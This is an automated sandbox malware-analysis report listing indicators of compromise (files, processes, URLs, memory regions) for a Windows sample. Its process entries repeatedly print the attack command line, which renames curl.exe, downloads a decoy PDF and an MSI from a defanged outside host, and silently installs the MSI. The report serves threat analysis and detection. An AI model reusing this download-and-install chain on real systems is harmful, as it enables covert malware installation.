Automated Malware Analysis IOC Report for

Files

File Path

Type

Category

Malicious

C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe

PE32 executable (console) Intel 80386, for MS Windows

dropped

Details

File:	C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe
Category:	dropped
Dump:	TNheBOJElq.exe.0.dr
ID:	dr_0
Target ID:	0
Process:	C:\Windows\SysWOW64\cmd.exe
Type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy:	6.743680599799538
Encrypted:	false
Ssdeep:	12288:sUE03qxFqJC1cwgysc/2gIsJFBhlyAjoSYgq:sUE06qCSwgbW2gpD3sAkSYgq
Size:	470528
Whitelisted:	true
Reputation:	low

Signature Hits	Behavior Group	Mitre Attack
Contains functionality to check if a debugger is running (IsDebuggerPresent)	Anti Debugging	Security Software Discovery
Contains functionality to dynamically determine API calls	Data Obfuscation, Anti Debugging	Native API
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)	Remote Access Functionality
Contains functionality to query CPU information (cpuid)	Language, Device and Operating System Detection	System Information Discovery
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Detected potential crypto function	System Summary	Encrypted Channel Archive Collected Data
Drops PE files	Persistence and Installation Behavior
Found decision node followed by non-executed suspicious APIs	Malware Analysis System Evasion
Found large amount of non-executed APIs	Malware Analysis System Evasion
Found potential string decryption / allocating functions	System Summary	Obfuscated Files or Information Deobfuscate/Decode Files or Information
Uses Microsoft's Enhanced Cryptographic Provider	Cryptography	Encrypted Channel
Contains functionality to download additional files from the internet	Networking	Ingress Tool Transfer
Contains functionality to enum processes or threads	System Summary	Process Discovery
Contains functionality to query local / system time	Language, Device and Operating System Detection	System Information Discovery System Time Discovery
Contains functionality to register its own exception handler	Anti Debugging
Creates files inside the program directory	System Summary	Masquerading
Found CURL tool	Networking	Application Layer Protocol
Public key (encryption) found	Cryptography	Archive Collected Data
Reads software policies	System Summary	System Information Discovery
Sample might require command line arguments	System Summary	Command and Scripting Interpreter
Spawns processes	System Summary	Process Injection
Tries to load missing DLLs	System Summary	DLL Side-Loading
URLs found in memory or binary data	Networking

\Device\ConDrv

ASCII text, with CR, LF line terminators

dropped

Details

File:	\Device\ConDrv
Category:	dropped
Dump:	ConDrv.4.dr
ID:	dr_2
Target ID:	4
Process:	C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe
Type:	ASCII text, with CR, LF line terminators
Entropy:	4.321712528700369
Encrypted:	false
Ssdeep:	3:3JtNVFXFd8wTiAA6tNxCHxo:3JtNvXFGN56t7CRo
Size:	65
Whitelisted:	false
Reputation:	low

Processes

Path

Cmdline

Malicious

C:\Windows\SysWOW64\cmd.exe

cmd /C ""C:\Windows\System32\cmd.exe" /c cd /d "C:\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\QMQjaBdqIo.pdf" hxxps://dbs5.pwods.com/download/pdf & "C:\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi hxxps://dbs5.pwods.com/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn"

Details

Is windows:	true
Is dropped:	false
PID:	6456
Target ID:	0
Parent PID:	3756
Name:	cmd.exe
Class:	cmd
Path:	C:\Windows\SysWOW64\cmd.exe
Commandline:	cmd /C ""C:\Windows\System32\cmd.exe" /c cd /d "C:\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\QMQjaBdqIo.pdf" hxxps://dbs5.pwods.com/download/pdf & "C:\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi hxxps://dbs5.pwods.com/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn"
Size:	236544
MD5:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Time:	08:42:03
Date:	07/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x240000
Modulesize:	368640
Wow64:	true

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Suspicious Copy From or To System Directory	System Summary
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Spawns processes	System Summary	Process Injection

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Details

Is windows:	true
Is dropped:	false
PID:	6508
Target ID:	1
Parent PID:	6456
Name:	conhost.exe
Path:	C:\Windows\System32\conhost.exe
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Size:	862208
MD5:	0D698AF330FD17BEE3BF90011D49251D
Time:	08:42:03
Date:	07/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff7699e0000
Modulesize:	892928
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c cd /d "C:\"

Details

Is windows:	true
Is dropped:	false
PID:	6724
Target ID:	2
Parent PID:	6456
Name:	cmd.exe
Class:	cmd
Path:	C:\Windows\SysWOW64\cmd.exe
Commandline:	"C:\Windows\System32\cmd.exe" /c cd /d "C:\"
Size:	236544
MD5:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Time:	08:42:03
Date:	07/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x240000
Modulesize:	368640
Wow64:	true

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Suspicious Copy From or To System Directory	System Summary
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Spawns processes	System Summary	Process Injection

C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe

TNheBOJElq.exe -o "C:\QMQjaBdqIo.pdf" hxxps://dbs5.pwods.com/download/pdf

Details

Is windows:	false
Is dropped:	true
PID:	6796
Target ID:	3
Parent PID:	6456
Name:	TNheBOJElq.exe
Path:	C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe
Commandline:	TNheBOJElq.exe -o "C:\QMQjaBdqIo.pdf" hxxps://dbs5.pwods.com/download/pdf
Size:	470528
MD5:	44E5BAEEE864F1E9EDBE3986246AB37A
Time:	08:42:03
Date:	07/10/2024
Reason:	newprocess
Reputation:	moderate
Is admin:	true
Is elevated:	true
Modulebase:	0xe00000
Modulesize:	487424
Wow64:	true

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Drops PE files	Persistence and Installation Behavior
Sigma detected: Suspicious Copy From or To System Directory	System Summary
Creates files inside the program directory	System Summary	Masquerading
Found CURL tool	Networking	Application Layer Protocol
Public key (encryption) found	Cryptography	Archive Collected Data
Sample might require command line arguments	System Summary	Command and Scripting Interpreter
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking
Binary contains paths to debug symbols	Compliance, System Summary

C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe

TNheBOJElq.exe -o bLhLldebqq.msi hxxps://dbs5.pwods.com/download/agent

Details

Is windows:	false
Is dropped:	true
PID:	6844
Target ID:	4
Parent PID:	6456
Name:	TNheBOJElq.exe
Path:	C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe
Commandline:	TNheBOJElq.exe -o bLhLldebqq.msi hxxps://dbs5.pwods.com/download/agent
Size:	470528
MD5:	44E5BAEEE864F1E9EDBE3986246AB37A
Time:	08:42:04
Date:	07/10/2024
Reason:	newprocess
Reputation:	moderate
Is admin:	true
Is elevated:	true
Modulebase:	0xe00000
Modulesize:	487424
Wow64:	true

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Drops PE files	Persistence and Installation Behavior
Sigma detected: Suspicious Copy From or To System Directory	System Summary
Creates files inside the program directory	System Summary	Masquerading
Found CURL tool	Networking	Application Layer Protocol
Public key (encryption) found	Cryptography	Archive Collected Data
Sample might require command line arguments	System Summary	Command and Scripting Interpreter
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking
Binary contains paths to debug symbols	Compliance, System Summary

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn

Details

Is windows:	true
Is dropped:	false
PID:	6884
Target ID:	5
Parent PID:	6456
Name:	msiexec.exe
Class:	system-tools
Path:	C:\Windows\SysWOW64\msiexec.exe
Commandline:	C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn
Size:	59904
MD5:	9D09DC1EDA745A5F87553048E57620CF
Time:	08:42:04
Date:	07/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x850000
Modulesize:	73728
Wow64:	true

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Suspicious Copy From or To System Directory	System Summary
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Spawns processes	System Summary	Process Injection

C:\Windows\System32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

Details

Is windows:	true
Is dropped:	false
PID:	7004
Target ID:	6
Parent PID:	620
Name:	msiexec.exe
Class:	system-tools
Path:	C:\Windows\System32\msiexec.exe
Commandline:	C:\Windows\system32\msiexec.exe /V
Size:	69632
MD5:	E5DA170027542E25EDE42FC54C929077
Time:	08:42:04
Date:	07/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff67f4b0000
Modulesize:	94208
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Suspicious Copy From or To System Directory	System Summary
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Spawns processes	System Summary	Process Injection

URLs

Name

Malicious

https://curl.se/docs/hsts.html

unknown

Details

Name:	https://curl.se/docs/hsts.html
TargetID:	-1
From Memory:	true
Source:	TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.1638165170.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.1641054291.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641656492.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr

Signature Hits	Behavior Group	Mitre Attack
URLs found in memory or binary data	Networking

https://curl.se/docs/copyright.htmlD

unknown

https://curl.se/libcurl/c/curl_easy_setopt.html

unknown

https://curl.se/P

unknown

https://curl.se/docs/http-cookies.html#

unknown

https://curl.se/docs/http-cookies.html

unknown

Details

Name:	https://curl.se/docs/http-cookies.html
TargetID:	-1
From Memory:	true
Source:	TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.1638165170.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.1641054291.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641656492.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr

Signature Hits	Behavior Group	Mitre Attack
URLs found in memory or binary data	Networking

https://curl.se/docs/hsts.html#

unknown

https://curl.se/docs/sslcerts.html

unknown

Details

Name:	https://curl.se/docs/sslcerts.html
TargetID:	-1
From Memory:	true
Source:	TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.1638165170.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.1641054291.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641656492.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr

Signature Hits	Behavior Group	Mitre Attack
URLs found in memory or binary data	Networking

https://curl.se/docs/sslcerts.htmlcurl

unknown

Domains

Name

Malicious

241.42.69.40.in-addr.arpa

unknown

Memdumps

Base Address

Regiontype

Protect

Malicious

E00000

unkown

page readonly

333D000

stack

page read and write

34B0000

heap

page read and write

E55000

unkown

page readonly

381F000

stack

page read and write

33A0000

heap

page read and write

34CA000

heap

page read and write

3460000

heap

page read and write

34C0000

heap

page read and write

E6F000

unkown

page read and write

E00000

unkown

page readonly

36EF000

stack

page read and write

382F000

stack

page read and write

346A000

heap

page read and write

E55000

unkown

page readonly

371E000

stack

page read and write

E01000

unkown

page execute read

33F0000

heap

page read and write

E00000

unkown

page readonly

3450000

heap

page read and write

E55000

unkown

page readonly

3910000

heap

page read and write

323D000

stack

page read and write

34CA000

heap

page read and write

E70000

unkown

page readonly

E00000

unkown

page readonly

3415000

heap

page read and write

E70000

unkown

page readonly

3390000

heap

page read and write

2FFD000

stack

page read and write

3360000

heap

page read and write

34C3000

heap

page read and write

3463000

heap

page read and write

E01000

unkown

page execute read

E01000

unkown

page execute read

3458000

heap

page read and write

34B8000

heap

page read and write

3420000

heap

page read and write

372E000

stack

page read and write

346A000

heap

page read and write

32FD000

stack

page read and write

33C5000

heap

page read and write

E01000

unkown

page execute read

3410000

heap

page read and write

33C0000

heap

page read and write

35EE000

stack

page read and write

E55000

unkown

page readonly

33AE000

stack

page read and write

3970000

heap

page read and write

33EE000

stack

page read and write

E70000

unkown

page readonly

E70000

unkown

page readonly

3380000

heap

page read and write

E6F000

unkown

page read and write

There are 44 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report

Files

Processes

URLs

Domains

Memdumps